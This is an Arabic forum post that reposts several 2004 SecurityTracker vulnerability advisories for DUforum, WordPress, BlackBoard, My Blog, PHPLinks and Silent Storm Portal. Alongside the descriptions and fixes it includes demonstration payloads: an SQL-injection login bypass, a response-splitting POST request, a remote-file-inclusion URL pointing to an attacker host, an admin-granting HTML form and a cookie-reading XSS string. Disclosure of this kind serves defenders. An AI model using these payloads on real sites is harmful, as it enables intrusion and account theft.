اكبرمكتبة ثغرات 2013

أضخم موسوعة ثغرات

(الروابط باللون الأسود)

SecurityTracker Alert ID: 1011595
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 11 2004

Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Exploit Included: Yes

Description: Soroush Dalili reported a vulnerability in DUforum. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

It is reported that the software does not properly validate user-supplied input. A remote user can supply a specially crafted request to execute SQL commands on the underlying database.

The 'login' form does not validate the 'password' variable. A remote user can exploit this to be authenticated to the system as an administrator. Demonstration exploit values are provided:

user= admin
password= ' or '1'='1

It is also reported that the 'FOR_ID' parameter in 'messages.asp' and the 'MSG_ID' parameter in 'messageDetail.asp' are affected. A demonstration exploit is provided:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] INJECT]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] INJECT]

It is also reported that the software does not filter HTML code from user-supplied input in messages. A remote user can submit a specially crafted message that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the DUforum software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Impact: A remote user can inject SQL commands to be executed by the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the DUforum software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "Soroosh Dalili" <s-dalili@cc.sbu.ac.ir>

Message History: None.

WordPress Input Validation Holes Permit Response Splitting Attacks

SecurityTracker Alert ID: 1011592
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 11 2004

Impact: Modification of system information, Modification of user information

Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes

Version(s): 1.2

Description: An input validation vulnerability was reported in WordPress. A remote user can conduct response splitting attacks.

Chaotic Evil reported that the 'wp-login.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted POST request to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit HTTP POST request is provided:

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
% 2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>
*defaced*</html>

The vendor was notified on September 24, 2004.

Impact: A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

Solution: The vendor has issued a fixed version (1.2.1), available at:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Vendor URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: "Chaotic Evil" <chaoticevil@spyring.com>

Message History: None

Vendor Issues Fix) BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1011566
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 7 2004

Impact: Disclosure of system information, Execution of arbitrary code via network, User access via network

Fix Available: Yes Vendor Confirmed: Yes

Version(s): 1.5.1; possibly prior versions

Description: Several vulnerabilities were reported in the BlackBoard Internet newsboard system. A remote user can execute arbitrary commands on the target system. A remote user can determine the installation path.

C-r-a-c-k love reported that the '/bb_lib/admin.inc.php' file does not properly validate user-supplied input. A remote user can submit a value for the $libpath variable to cause the target system to include and execute PHP code from a remote location. The code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] .inc.php?libpath=http://[attacker]/

It is also reported that a remote user can request the following type of URL to cause the system to generate an error message that discloses the installation path:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Other scripts are affected, including 'admin.inc.php' and 'cp.inc.php'.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can determine the installation path.

Solution: The vendor issued a fixed version (P-a-t-c-h level 1.5.1-h) on October 6, 2004, available at:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

The vendor's official announcement is available at:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Vendor URL: blackboard.unclassified.de/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Yves Goergen <contact@unclassified.de>

Message History: This archive entry is a follow-up to the message listed below.
Oct 6 2004 BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands

BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands

SecurityTracker Alert ID: 1011551
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 6 2004

Impact: Disclosure of system information, Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 1.5.1; possibly prior versions

Description: Several vulnerabilities were reported in the BlackBoard Internet newsboard system. A remote user can execute arbitrary commands on the target system. A remote user can determine the installation path.

C-r-a-c-k love reported that the '/bb_lib/admin.inc.php' file does not properly validate user-supplied input. A remote user can submit a value for the $libpath variable to cause the target system to include and execute PHP code from a remote location. The code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] .inc.php?libpath=http://[attacker]/

It is also reported that a remote user can request the following type of URL to cause the system to generate an error message that discloses the installation path:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Other scripts are affected, including 'admin.inc.php' and 'cp.inc.php'.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can determine the installation path.

Solution: No solution was available at the time of this entry.

Vendor URL: blackboard.unclassified.de/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Lin Xiaofeng <C-r-a-c-k [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]>

Message History: This archive entry has one or more follow-up message(s) listed below.
Oct 7 2004 (Vendor Issues Fix) BlackBoard Internet Newsboard System Input Validation Flaws Let Remote Users Execute Arbitrary Commands (Yves Goergen <contact@unclassified.de>)
The vendor has issued a fix

My Blog Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID: 1011542
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 5 2004

Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Fix Available: Yes Vendor Confirmed: Yes

Version(s): prior to 1.21

Description: An input validation vulnerability was reported in My Blog. A remote user can conduct cross-site scripting attacks.

The vendor reported that the software does not sufficiently validate user-supplied input and does not encode some HTML input.

A remote user can supply specially crafted input to potentially cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the My Blog software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Impact: The impact was not specified, but is believed to allow a remote user to access the target user's cookies (including authentication cookies), if any, associated with the site running the My Blog software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: The vendor has released a fixed version (1.21), available at:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Vendor URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any

PHPLinks Discloses Installation Path to Remote Users

SecurityTracker Alert ID: 1011537
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Oct 5 2004

Impact: Disclosure of system information

Exploit Included: Yes

Description: A vulnerability was reported in PHPLinks. A remote user can determine the installation path.

Nikyt0x Argentina reported that a remote user can request the following type of URL to cause the system to disclose the installation path:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Impact: A remote user can determine the installation path.

Solution: No solution was available at the time of this entry.

Vendor URL: phplinks.sourceforge.net/ (Links to External Site)

Cause: Access control error, Exception handling error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Nikyt0x Argentina <nikyt0x@hotmail.com>

Message History: None

Silent Storm Portal Input Validation Errors Let Remote Users Gain Administrative Privileges and Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID: 1011470
SecurityTracker URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Sep 30 2004

Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information, User access via network

Exploit Included: Yes

Version(s): 2.1, 2.2

Description: Some vulnerabilities were reported in Silent Storm Portal. A remote user can obtain administrative privileges on the target application. A remote user can also conduct cross-site scripting attacks.

CHT Security Research reported that 'profile.php' does not properly validate user-supplied input. A remote user can submit specially crafted input to inject data into the 'users.dat' file to create a new user account with administrative privileges.

A demonstration exploit form is provided:

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>

It is also reported that the software does not filter HTML code from user-supplied input in the 'module' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Silent Storm Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] lert%28document.cookie%29;%3C/script%3E

The original advisory is available at:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Impact: A remote user can obtain administrative privileges on the target application.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Silent Storm Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] (Links to External Site)

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: R00tCr4ck <root@cyberspy.org>

Message History: None